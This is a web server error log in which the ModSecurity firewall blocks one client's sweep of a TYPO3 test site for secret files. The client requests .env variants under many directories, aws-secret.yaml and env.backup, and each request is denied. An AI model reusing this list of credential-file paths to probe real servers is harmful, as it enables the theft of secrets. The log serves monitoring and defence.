[Tue Feb 03 13:09:17.611481 2026] [:error] [pid 1833923] [client 195.178.110.33:47934] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aYHlbVdjeLipXl8WaL_BxQAAAAA"]
[Tue Feb 03 13:09:17.611686 2026] [:error] [pid 1833923] [client 195.178.110.33:47934] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aYHlbVdjeLipXl8WaL_BxQAAAAA"]
[Tue Feb 03 13:09:17.714461 2026] [:error] [pid 1833923] [client 195.178.110.33:47934] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aYHlbVdjeLipXl8WaL_BxgAAAAA"]
[Tue Feb 03 13:09:17.714721 2026] [:error] [pid 1833923] [client 195.178.110.33:47934] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aYHlbVdjeLipXl8WaL_BxgAAAAA"]
[Tue Feb 03 13:09:17.714914 2026] [:error] [pid 1833923] [client 195.178.110.33:47934] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aYHlbVdjeLipXl8WaL_BxgAAAAA"]
[Tue Feb 03 13:09:18.022124 2026] [:error] [pid 1833999] [client 195.178.110.33:47948] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aYHlbvQ_NRkidvNzMZq4EQAAAAY"]
[Tue Feb 03 13:09:18.022373 2026] [:error] [pid 1833999] [client 195.178.110.33:47948] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aYHlbvQ_NRkidvNzMZq4EQAAAAY"]
[Tue Feb 03 13:09:18.022566 2026] [:error] [pid 1833999] [client 195.178.110.33:47948] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aYHlbvQ_NRkidvNzMZq4EQAAAAY"]
[Tue Feb 03 13:09:18.103418 2026] [:error] [pid 1833999] [client 195.178.110.33:47948] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aYHlbvQ_NRkidvNzMZq4EgAAAAY"]
[Tue Feb 03 13:09:18.103653 2026] [:error] [pid 1833999] [client 195.178.110.33:47948] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aYHlbvQ_NRkidvNzMZq4EgAAAAY"]
[Tue Feb 03 13:09:18.103819 2026] [:error] [pid 1833999] [client 195.178.110.33:47948] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aYHlbvQ_NRkidvNzMZq4EgAAAAY"]
[Tue Feb 03 13:09:18.183600 2026] [:error] [pid 1833999] [client 195.178.110.33:47948] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aYHlbvQ_NRkidvNzMZq4EwAAAAY"]
[Tue Feb 03 13:09:18.183828 2026] [:error] [pid 1833999] [client 195.178.110.33:47948] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aYHlbvQ_NRkidvNzMZq4EwAAAAY"]
[Tue Feb 03 13:09:18.184004 2026] [:error] [pid 1833999] [client 195.178.110.33:47948] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aYHlbvQ_NRkidvNzMZq4EwAAAAY"]
[Tue Feb 03 13:09:18.230561 2026] [:error] [pid 1833999] [client 195.178.110.33:47948] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aYHlbvQ_NRkidvNzMZq4FAAAAAY"]
[Tue Feb 03 13:09:18.230783 2026] [:error] [pid 1833999] [client 195.178.110.33:47948] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aYHlbvQ_NRkidvNzMZq4FAAAAAY"]
[Tue Feb 03 13:09:18.230972 2026] [:error] [pid 1833999] [client 195.178.110.33:47948] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aYHlbvQ_NRkidvNzMZq4FAAAAAY"]
[Tue Feb 03 13:09:18.976072 2026] [:error] [pid 1833927] [client 195.178.110.33:47960] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aYHlbhcScgBearvs1jYciwAAAAQ"]
[Tue Feb 03 13:09:18.976289 2026] [:error] [pid 1833927] [client 195.178.110.33:47960] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aYHlbhcScgBearvs1jYciwAAAAQ"]
[Tue Feb 03 13:09:18.976474 2026] [:error] [pid 1833927] [client 195.178.110.33:47960] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aYHlbhcScgBearvs1jYciwAAAAQ"]
[Tue Feb 03 13:09:19.946285 2026] [authz_core:error] [pid 1833925] [client 195.178.110.33:47968] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws-secret.yaml
[Tue Feb 03 13:09:19.991379 2026] [:error] [pid 1833925] [client 195.178.110.33:47968] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /awstats/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aYHlb-a85s69zS4gnnjjBQAAAAI"]
[Tue Feb 03 13:09:19.991717 2026] [:error] [pid 1833925] [client 195.178.110.33:47968] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aYHlb-a85s69zS4gnnjjBQAAAAI"]
[Tue Feb 03 13:09:19.991938 2026] [:error] [pid 1833925] [client 195.178.110.33:47968] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aYHlb-a85s69zS4gnnjjBQAAAAI"]
[Tue Feb 03 13:09:20.117294 2026] [:error] [pid 1833926] [client 195.178.110.33:47980] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /conf/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aYHlcNAEDj_XQhd9DReYHwAAAAM"]
[Tue Feb 03 13:09:20.117513 2026] [:error] [pid 1833926] [client 195.178.110.33:47980] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aYHlcNAEDj_XQhd9DReYHwAAAAM"]
[Tue Feb 03 13:09:20.117682 2026] [:error] [pid 1833926] [client 195.178.110.33:47980] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aYHlcNAEDj_XQhd9DReYHwAAAAM"]
[Tue Feb 03 13:09:20.146731 2026] [:error] [pid 1833926] [client 195.178.110.33:47980] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aYHlcNAEDj_XQhd9DReYIAAAAAM"]
[Tue Feb 03 13:09:20.146941 2026] [:error] [pid 1833926] [client 195.178.110.33:47980] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aYHlcNAEDj_XQhd9DReYIAAAAAM"]
[Tue Feb 03 13:09:20.147106 2026] [:error] [pid 1833926] [client 195.178.110.33:47980] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aYHlcNAEDj_XQhd9DReYIAAAAAM"]
[Tue Feb 03 13:09:20.772549 2026] [:error] [pid 1833924] [client 195.178.110.33:47986] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aYHlcE7r6RwSjQkPjN4W5QAAAAE"]
[Tue Feb 03 13:09:20.772769 2026] [:error] [pid 1833924] [client 195.178.110.33:47986] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aYHlcE7r6RwSjQkPjN4W5QAAAAE"]
[Tue Feb 03 13:09:20.772948 2026] [:error] [pid 1833924] [client 195.178.110.33:47986] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aYHlcE7r6RwSjQkPjN4W5QAAAAE"]
[Tue Feb 03 13:09:21.964594 2026] [:error] [pid 1833924] [client 195.178.110.33:47986] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aYHlcU7r6RwSjQkPjN4W5gAAAAE"]
[Tue Feb 03 13:09:21.964855 2026] [:error] [pid 1833924] [client 195.178.110.33:47986] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aYHlcU7r6RwSjQkPjN4W5gAAAAE"]
[Tue Feb 03 13:09:21.965045 2026] [:error] [pid 1833924] [client 195.178.110.33:47986] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aYHlcU7r6RwSjQkPjN4W5gAAAAE"]
[Tue Feb 03 13:09:21.999884 2026] [:error] [pid 1833924] [client 195.178.110.33:47986] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aYHlcU7r6RwSjQkPjN4W5wAAAAE"]
[Tue Feb 03 13:09:22.000104 2026] [:error] [pid 1833924] [client 195.178.110.33:47986] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aYHlcU7r6RwSjQkPjN4W5wAAAAE"]
[Tue Feb 03 13:09:22.000285 2026] [:error] [pid 1833924] [client 195.178.110.33:47986] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aYHlcU7r6RwSjQkPjN4W5wAAAAE"]
[Tue Feb 03 13:09:22.031159 2026] [:error] [pid 1833924] [client 195.178.110.33:47986] [client 195.178.110.33] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aYHlck7r6RwSjQkPjN4W6AAAAAE"]
[Tue Feb 03 13:09:22.031457 2026] [:error] [pid 1833924] [client 195.178.110.33:47986] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aYHlck7r6RwSjQkPjN4W6AAAAAE"]
